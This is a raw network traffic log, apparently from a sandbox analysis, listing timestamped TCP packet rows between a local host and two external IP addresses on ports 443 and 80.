Oct 29, 2021 20:50:18.121994019 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.122005939 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.122019053 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.122083902 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.122138977 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.123326063 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.123342037 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.123435974 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.123795986 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.123800993 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.123812914 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.123823881 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.123902082 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.123963118 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.125075102 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.125092983 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.125201941 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.125544071 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.125551939 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.125565052 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.125576973 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.125581026 CEST	443	49841	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:18.125642061 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.125736952 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.126849890 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.127255917 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.141848087 CEST	49841	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:18.275791883 CEST	49851	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.329046965 CEST	80	49851	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:18.329210043 CEST	49851	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.329341888 CEST	49851	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.330640078 CEST	49851	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.382481098 CEST	80	49851	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:18.383569002 CEST	80	49851	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:18.410227060 CEST	80	49851	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:18.410343885 CEST	49851	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.410576105 CEST	49851	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.462891102 CEST	49852	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.463438034 CEST	80	49851	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:18.514648914 CEST	80	49852	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:18.514786005 CEST	49852	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.514930010 CEST	49852	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.516788960 CEST	49852	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.566559076 CEST	80	49852	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:18.568270922 CEST	80	49852	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:18.591012955 CEST	80	49852	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:18.591116905 CEST	49852	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.591312885 CEST	49852	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.642843008 CEST	80	49852	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:18.670460939 CEST	49853	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.721909046 CEST	80	49853	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:18.722052097 CEST	49853	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.722199917 CEST	49853	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.722210884 CEST	49853	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.799061060 CEST	80	49853	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:18.799245119 CEST	49853	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.799443007 CEST	49853	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.850857973 CEST	80	49853	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:18.852040052 CEST	49854	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.905632019 CEST	80	49854	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:18.905812979 CEST	49854	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.905951023 CEST	49854	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.907654047 CEST	49854	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.960113049 CEST	80	49854	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:18.961007118 CEST	80	49854	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:18.987524986 CEST	80	49854	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:18.987613916 CEST	49854	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:18.987797022 CEST	49854	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.028984070 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.041572094 CEST	80	49854	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.081399918 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.081518888 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.081646919 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.081665039 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.133956909 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.163575888 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.163609982 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.163639069 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.163660049 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.163683891 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.163697004 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.163711071 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.163717031 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.163733006 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.163758039 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.163758039 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.163781881 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.163800001 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.163805962 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.163849115 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.215958118 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.215985060 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.216005087 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.216022968 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.216039896 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.216057062 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.216073990 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.216092110 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.216109037 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.216125965 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.216304064 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.216314077 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.216324091 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.216347933 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.216404915 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.216353893 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.216414928 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.216418982 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.216422081 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.216423988 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.216443062 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.216459990 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.216476917 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.216494083 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.216510057 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.216511965 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.216519117 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.216528893 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.216559887 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.216597080 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.258356094 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.258402109 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.258513927 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.259004116 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.259023905 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.268630028 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.268663883 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.268693924 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.268716097 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.268727064 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.268758059 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.268770933 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.268793106 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.268812895 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.268835068 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.268836021 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.268877029 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.268884897 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.268907070 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.268929005 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.268943071 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.268948078 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.268975973 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.268986940 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.269015074 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269037008 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269056082 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269057035 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.269077063 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269093990 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.269097090 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269117117 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269135952 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.269139051 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269180059 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.269196987 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269217014 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269262075 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.269304991 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269325972 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269350052 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269361973 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.269370079 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269390106 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269407034 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.269409895 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269448996 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.269474030 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269495010 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269530058 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.269531012 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269553900 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269572973 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269593000 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269593954 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.269614935 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269632101 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.269634008 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269670963 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269674063 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.269747972 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269784927 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269805908 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.269809008 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.269856930 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.296277046 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.299778938 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.321405888 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.321476936 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.321527958 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.321556091 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.321578979 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.321631908 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.321649075 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.321682930 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.321732044 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.321734905 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.321783066 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.321826935 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.321830988 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.321880102 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.321923971 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.321935892 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.321968079 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322016001 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.322016001 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322066069 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322112083 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.322112083 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322154999 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322195053 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322201014 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.322236061 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322277069 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322285891 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.322319031 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322359085 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322371960 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.322397947 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322439909 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322441101 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.322479963 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322520971 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322525978 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.322562933 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322607040 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322611094 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.322663069 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322710991 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322715998 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.322753906 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322801113 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322805882 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.322850943 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322899103 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322913885 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.322947979 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322993040 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.322993040 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.323040962 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.323086977 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.323088884 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.323134899 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.323180914 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.323193073 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.323237896 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.323278904 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.323285103 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.323324919 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.323370934 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.323374033 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.323415041 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.323461056 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.323462009 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.323508024 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.323549986 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.323553085 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.323600054 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.323648930 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.340867996 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.359661102 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.359765053 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.359796047 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.359819889 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.359826088 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.359837055 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.359874010 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.359883070 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.359899044 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.359919071 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.359927893 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.359939098 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.359981060 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.360461950 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.360491991 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.360538960 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.360553026 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.360656023 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.361277103 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.361332893 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.361363888 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.361392021 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.361409903 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.361459017 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.362035990 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.362106085 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.362131119 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.362157106 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.362168074 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.362210989 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.362817049 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.362895012 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.362931013 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.362957954 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.362972975 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.363018990 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.363675117 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.363729000 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.363779068 CEST	49856	443	192.168.2.4	162.159.129.233
Oct 29, 2021 20:50:19.363794088 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.375883102 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.375926018 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.375946999 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.375966072 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.375983000 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376003027 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376019001 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376035929 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376051903 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376068115 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376085043 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376101971 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376178980 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376198053 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376215935 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376239061 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376264095 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376297951 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376317024 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376342058 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376379967 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.376452923 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.376465082 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376490116 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376512051 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376535892 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376559973 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376559973 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.376584053 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376593113 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.376607895 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.376611948 CEST	443	49856	162.159.129.233	192.168.2.4
Oct 29, 2021 20:50:19.376629114 CEST	49855	80	192.168.2.4	185.98.87.159
